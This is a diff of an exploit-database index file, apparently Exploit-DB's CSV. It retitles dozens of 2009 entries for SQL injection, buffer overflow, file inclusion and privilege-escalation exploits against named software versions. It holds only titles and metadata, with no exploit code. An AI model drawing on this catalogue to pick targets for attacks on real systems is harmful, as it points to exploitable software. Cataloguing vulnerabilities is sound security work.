8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0 8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - (entry_id) SQL Injection",2009-03-16,boom3rang,php,webapps,0 8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,windows,dos,0 -8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - (.Subtitle) Buffer Overflow (PoC)",2009-03-16,"Encrypt3d.M!nd ",windows,dos,0 +8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - '.Subtitle' Buffer Overflow (PoC)",2009-03-16,"Encrypt3d.M!nd ",windows,dos,0 8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0 8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow (SEH)",2009-03-17,LiquidWorm,windows,remote,0 8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 -8229,platforms/php/webapps/8229.txt,"Wordpress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0 +8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0 8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion",2009-03-17,Garry,php,webapps,0 -8231,platforms/windows/local/8231.php,"CDex 1.70b2 (Windows XP SP3) - (.ogg) Local Buffer Overflow",2009-03-18,Nine:Situations:Group,windows,local,0 +8231,platforms/windows/local/8231.php,"CDex 1.70b2 (Windows XP SP3) - '.ogg' Local Buffer Overflow",2009-03-18,Nine:Situations:Group,windows,local,0 8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - '.pls' Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0 8233,platforms/windows/local/8233.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow",2009-03-18,His0k4,windows,local,0 8234,platforms/windows/local/8234.py,"Chasys Media Player 1.1 - '.pls' Stack Overflow (2)",2009-03-18,"Encrypt3d.M!nd ",windows,local,0 @@ -7758,33 +7759,33 @@ id,file,description,date,author,platform,type,port 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0 8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local,0 -8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Command Execution (Post-Authenticated)",2009-03-19,"Emory University",cgi,webapps,0 +8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Post-Authentication) Command Execution",2009-03-19,"Emory University",cgi,webapps,0 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0 -8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - (.bsl) Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 +8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal SEH Overwrite",2009-03-20,His0k4,windows,local,0 8252,platforms/php/webapps/8252.txt,"pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 8253,platforms/windows/remote/8253.c,"Racer 0.5.3b5 - Remote Stack Buffer Overflow",2009-03-20,"fl0 fl0w",windows,remote,0 8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - (UserGallery) Blind SQL Injection",2009-03-23,Invisibility,php,webapps,0 -8255,platforms/php/webapps/8255.txt,"SuperNews 1.5 - (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0 +8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0 8256,platforms/windows/remote/8256.c,"Sysax Multi Server 4.3 - Arbitrary Delete Files Exploit",2009-03-23,"Jonathan Salwan",windows,remote,0 8257,platforms/windows/remote/8257.txt,"Orbit Downloader 2.8.7 - Arbitrary File Deletion",2009-03-23,waraxe,windows,remote,0 8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - (get_read.php section) SQL Injection",2009-03-23,dun,php,webapps,0 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX router - Remote Denial of Service",2009-03-23,Benkei,hardware,dos,0 8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - (ktimer) Kernel Privilege Escalation",2009-03-23,mu-b,freebsd,local,0 -8262,platforms/osx/dos/8262.c,"Mac OSX xnu 1228.3.13 - (zip-notify) Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos,0 -8263,platforms/osx/dos/8263.c,"Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 -8264,platforms/osx/dos/8264.c,"Mac OSX xnu 1228.3.13 - (profil) Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 -8265,platforms/osx/dos/8265.c,"Mac OSX xnu 1228.x - (vfssysctl) Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 -8266,platforms/osx/local/8266.txt,"Mac OSX xnu 1228.x - (hfs-fcntl) Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0 +8262,platforms/osx/dos/8262.c,"Apple Mac OS X xnu 1228.3.13 - (zip-notify) Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos,0 +8263,platforms/osx/dos/8263.c,"Apple Mac OS X xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 +8264,platforms/osx/dos/8264.c,"Apple Mac OS X xnu 1228.3.13 - (profil) Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 +8265,platforms/osx/dos/8265.c,"Apple Mac OS X xnu 1228.x - (vfssysctl) Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 +8266,platforms/osx/local/8266.txt,"Apple Mac OS X xnu 1228.x - (hfs-fcntl) Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - '.pls' Universal Seh Overwrite",2009-03-23,His0k4,windows,local,0 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution Exploit",2009-03-23,YOUCODE,php,webapps,0 8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0 -8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion Exploit",2009-03-23,"Alfons Luja",php,webapps,0 +8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 -8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post-Authenticated) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 +8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal SEH Overwrite",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal SEH Overwrite",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0 @@ -7794,7 +7795,7 @@ id,file,description,date,author,platform,type,port 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0 -8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Post-Authenticated) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 +8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload Exploit",2009-03-25,EgiX,php,webapps,0 @@ -7806,11 +7807,11 @@ id,file,description,date,author,platform,type,port 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0 8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - (NLST) Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0 8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22 -8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - (username) Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 +8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - (Local File Inclusion) Remote Command Execution Exploit",2009-03-27,Osirys,php,webapps,0 8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - '.CMP' Stack Overflow",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 -8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - (.hhp) Stack Overflow (PoC)",2009-03-27,"Encrypt3d.M!nd ",windows,dos,0 +8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - '.hhp' Stack Overflow (PoC)",2009-03-27,"Encrypt3d.M!nd ",windows,dos,0 8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 - (hhp) Local Buffer Overflow",2009-03-29,LiquidWorm,windows,local,0 8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - COM_applyFilter()/order SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0 8303,platforms/linux/local/8303.c,"pam-krb5 < 3.13 - Privilege Escalation",2009-03-29,"Jon Oberheide",linux,local,0 @@ -7821,7 +7822,7 @@ id,file,description,date,author,platform,type,port 8308,platforms/multiple/dos/8308.c,"Wireshark 1.0.6 - PN-DCP Format String (PoC)",2009-03-30,"THCX Labs",multiple,dos,0 8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - (members.php memid) SQL Injection",2009-03-30,SirGod,php,webapps,0 8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x - (HEAD) Remote Denial of Service",2009-03-30,"Jonathan Salwan",windows,dos,0 -8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - (FileName) Local Stack Overflow",2009-03-30,"Encrypt3d.M!nd ",windows,local,0 +8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - 'Filename' Local Stack Overflow",2009-03-30,"Encrypt3d.M!nd ",windows,local,0 8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (Playlist) Universal SEH Overwrite",2009-03-30,His0k4,windows,local,0 8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 - PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0 8314,platforms/windows/dos/8314.php,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)",2009-03-30,"Alfons Luja",windows,dos,0 @@ -7834,7 +7835,7 @@ id,file,description,date,author,platform,type,port 8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0 8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)",2009-03-30,b1@ckeYe,windows,local,0 8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injections",2009-03-31,"Salvatore Fresta",php,webapps,0 -8324,platforms/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution Exploit",2009-03-31,BlackHawk,php,webapps,0 +8324,platforms/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution",2009-03-31,BlackHawk,php,webapps,0 8325,platforms/windows/dos/8325.py,"Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash Exploit",2009-03-31,"Ahmed Obied",windows,dos,0 8326,platforms/php/webapps/8326.rb,"VirtueMart 1.1.2 - SQL Injection (Metasploit)",2009-03-31,waraxe,php,webapps,0 8327,platforms/php/webapps/8327.txt,"virtuemart 1.1.2 - Multiple Vulnerabilities",2009-03-31,waraxe,php,webapps,0 @@ -7856,19 +7857,19 @@ id,file,description,date,author,platform,type,port 8343,platforms/windows/local/8343.pl,"UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow",2009-04-03,SkD,windows,local,0 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 -8346,platforms/php/webapps/8346.txt,"ActiveKB Knowledgebase - 'loadpanel.php Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 +8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'loadpanel.php Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0 -8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Post-Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0 +8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution",2009-04-03,brain[pillow],php,webapps,0 8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - (topic_id) SQL Injection / Credentials Disclosure Exploit",2009-04-03,StAkeR,php,webapps,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0 8353,platforms/php/webapps/8353.txt,"Joomla Component com_bookjoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0 8354,platforms/windows/remote/8354.py,"XBMC 8.10 - GET Request Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,windows,remote,80 -8355,platforms/php/webapps/8355.txt,"FlexCMS Calendar - (ItemId) Blind SQL Injection",2009-04-06,Lanti-Net,php,webapps,0 +8355,platforms/php/webapps/8355.txt,"FlexCMS Calendar - 'itemID' Blind SQL Injection",2009-04-06,Lanti-Net,php,webapps,0 8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2)",2009-04-06,DATA_SNIPER,windows,dos,0 -8357,platforms/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 - (skin) Local File Inclusion Exploit",2009-04-06,LOTFREE,php,webapps,0 -8358,platforms/windows/dos/8358.pl,"UltraISO 9.3.3.2685 - (.ui) Off-by-One / Buffer Overflow (PoC)",2009-04-06,Stack,windows,dos,0 +8357,platforms/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 - (skin) Local File Inclusion",2009-04-06,LOTFREE,php,webapps,0 +8358,platforms/windows/dos/8358.pl,"UltraISO 9.3.3.2685 - '.ui' Off-by-One / Buffer Overflow (PoC)",2009-04-06,Stack,windows,dos,0 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router - WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - (usnf) Local Heap Overflow (PoC)",2009-04-06,LiquidWorm,windows,dos,0 8361,platforms/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0 @@ -7881,13 +7882,13 @@ id,file,description,date,author,platform,type,port 8368,platforms/windows/remote/8368.txt,"peterConnects Web Server - Traversal Arbitrary File Access",2009-04-08,"Bugs NotHugs",windows,remote,0 8369,platforms/linux/local/8369.sh,"Linux Kernel < 2.6.29 - 'exit_notify()' Privilege Escalation",2009-04-08,gat3way,linux,local,0 8370,platforms/windows/dos/8370.pl,"GOM Player 2.1.16.6134 - Subtitle Local Buffer Overflow (PoC)",2009-04-08,"Bui Quang Minh",windows,dos,0 -8371,platforms/windows/local/8371.pl,"OTSTurntables 1.00.027 - '.m3u' / '.ofl' Universal Buffer Overflow Exploit",2009-04-08,AlpHaNiX,windows,local,0 +8371,platforms/windows/local/8371.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Buffer Overflow Exploit",2009-04-08,AlpHaNiX,windows,local,0 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 8373,platforms/php/webapps/8373.txt,"Xplode CMS - (wrap_script) SQL Injection",2009-04-08,PLATEN,php,webapps,0 8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 - (DB.MDB) Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0 8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 - SEC_authenticate() SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps,0 -8377,platforms/asp/webapps/8377.pl,"Exjune GuestBook 2.0 - Remote Database Disclosure Exploit",2009-04-09,AlpHaNiX,asp,webapps,0 -8378,platforms/windows/dos/8378.pl,"SWF Opener 1.3 - (.swf) Off-by-One Buffer Overflow (PoC)",2009-04-09,Stack,windows,dos,0 +8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure Exploit",2009-04-09,AlpHaNiX,asp,webapps,0 +8378,platforms/windows/dos/8378.pl,"SWF Opener 1.3 - '.swf' Off-by-One Buffer Overflow (PoC)",2009-04-09,Stack,windows,dos,0 8379,platforms/asp/webapps/8379.txt,"BackendCMS 5.0 - (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0 8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - (Authentication Bypass) SQL Injection",2009-04-09,Osirys,php,webapps,0 @@ -7898,12 +7899,12 @@ id,file,description,date,author,platform,type,port 8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps,0 8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 - (refer_id) Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps,0 -8390,platforms/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 - (.cue) Stack Buffer Overflow (PoC)",2009-04-10,"fl0 fl0w",windows,dos,0 +8390,platforms/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 - '.cue' Stack Buffer Overflow (PoC)",2009-04-10,"fl0 fl0w",windows,dos,0 8391,platforms/windows/dos/8391.txt,"Chance-i DiViS-Web DVR System - ActiveX Control Heap Overflow (PoC)",2009-04-10,DSecRG,windows,dos,0 -8392,platforms/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-server - Directory Traversal",2009-04-10,DSecRG,windows,remote,0 +8392,platforms/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-Server - Directory Traversal",2009-04-10,DSecRG,windows,remote,0 8393,platforms/hardware/dos/8393.txt,"Cisco ASA/PIX - Appliances Fail to Properly Check Fragmented TCP Packets",2009-04-10,"Daniel Clemens",hardware,dos,0 8394,platforms/php/webapps/8394.txt,"mozilocms 1.11 - (Local File Inclusion / Full Path Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-10,SirGod,php,webapps,0 -8395,platforms/php/webapps/8395.txt,"Redaxscript 0.2.0 - (language) Local File Inclusion",2009-04-10,SirGod,php,webapps,0 +8395,platforms/php/webapps/8395.txt,"RedaxScript 0.2.0 - 'Language' Local File Inclusion",2009-04-10,SirGod,php,webapps,0 8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,php,webapps,0 8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Arbitrary File Upload",2009-04-10,ZoRLu,asp,webapps,0 8398,platforms/windows/remote/8398.php,"FTPDMIN 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study)",2009-04-13,surfista,windows,remote,21 @@ -7916,7 +7917,7 @@ id,file,description,date,author,platform,type,port 8406,platforms/openbsd/dos/8406.txt,"OpenBSD 4.5 - (IP datagrams) Remote Denial of Service",2009-04-13,Rembrandt,openbsd,dos,0 8407,platforms/windows/dos/8407.pl,"ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 8408,platforms/php/webapps/8408.txt,"X10Media Mp3 - Search Engine < 1.6.2 Admin Access",2009-04-13,THUNDER,php,webapps,0 -8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - (lang) Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0 +8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0 8410,platforms/windows/local/8410.pl,"RM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local,0 8411,platforms/windows/local/8411.c,"WM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local,0 8412,platforms/windows/local/8412.pl,"ASX to MP3 Converter 3.0.0.7 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local,0 @@ -7927,7 +7928,7 @@ id,file,description,date,author,platform,type,port 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 8419,platforms/windows/remote/8419.pl,"FTPDMIN 0.96 - Arbitrary File Disclosure Exploit",2009-04-13,Stack,windows,remote,21 -8420,platforms/windows/local/8420.py,"BulletProof FTP Client 2009 - (.bps) Buffer Overflow (SEH)",2009-04-13,His0k4,windows,local,0 +8420,platforms/windows/local/8420.py,"BulletProof FTP Client 2009 - '.bps' Buffer Overflow (SEH)",2009-04-13,His0k4,windows,local,0 8421,platforms/windows/remote/8421.py,"Steamcast - (HTTP Request) Remote Buffer Overflow (SEH) (1)",2009-04-13,His0k4,windows,remote,8000 8422,platforms/windows/remote/8422.py,"Steamcast - (HTTP Request) Remote Buffer Overflow (SEH) (2)",2009-04-13,His0k4,windows,remote,8000 8423,platforms/php/webapps/8423.txt,"Jamroom - 'index.php t' Local File Inclusion",2009-04-14,zxvf,php,webapps,0 @@ -7935,11 +7936,11 @@ id,file,description,date,author,platform,type,port 8425,platforms/php/webapps/8425.txt,"PHP-revista 1.1.2 - (Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0 8426,platforms/windows/local/8426.pl,"Shadow Stream Recorder - '.m3u' Universal Stack Overflow",2009-04-14,AlpHaNiX,windows,local,0 8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter - Universal Stack Overflow",2009-04-14,Stack,windows,local,0 -8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 (Windows) - Webserver Directory Traversal",2009-04-14,e.wiZz!,windows,remote,0 +8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 (Windows) - WebServer Directory Traversal",2009-04-14,e.wiZz!,windows,remote,0 8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b - Remote Denial of Service",2009-04-14,ksa04,multiple,dos,0 8430,platforms/openbsd/dos/8430.py,"OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service",2009-04-14,nonroot,openbsd,dos,0 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0 -8432,platforms/php/webapps/8432.txt,"Aqua CMS - (username) SQL Injection",2009-04-14,halkfild,php,webapps,0 +8432,platforms/php/webapps/8432.txt,"Aqua CMS - 'username' SQL Injection",2009-04-14,halkfild,php,webapps,0 8433,platforms/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injections",2009-04-14,Dimi4,php,webapps,0 8434,platforms/windows/dos/8434.html,"PowerCHM 5.7 - (Long URL) Local Stack Overflow (PoC)",2009-04-14,SuB-ZeRo,windows,dos,0 8435,platforms/php/webapps/8435.txt,"W2B phpEmployment - 'conf.inc' File Disclosure",2009-04-14,InjEctOr5,php,webapps,0 @@ -7953,41 +7954,41 @@ id,file,description,date,author,platform,type,port 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0 8444,platforms/windows/local/8444.cpp,"Star Downloader Free 1.45 - '.dat' Universal SEH Overwrite",2009-04-15,dun,windows,local,0 8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - '.mid' Integer Overflow (PoC)",2009-04-15,HuoFu,windows,dos,0 -8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 +8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow (PoC)",2009-04-15,e.wiZz!,windows,dos,0 8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - (Authentication Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 8451,platforms/windows/dos/8451.pl,"Apollo 37zz - '.m3u' Local Heap Overflow (PoC)",2009-04-16,Cyber-Zone,windows,dos,0 -8452,platforms/windows/dos/8452.c,"Elecard AVC HD Player - .XPL Stack Buffer Overflow (SEH) (PoC)",2009-04-16,"fl0 fl0w",windows,dos,0 +8452,platforms/windows/dos/8452.c,"Elecard AVC HD Player - '.XPL' Stack Buffer Overflow (SEH) (PoC)",2009-04-16,"fl0 fl0w",windows,dos,0 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP 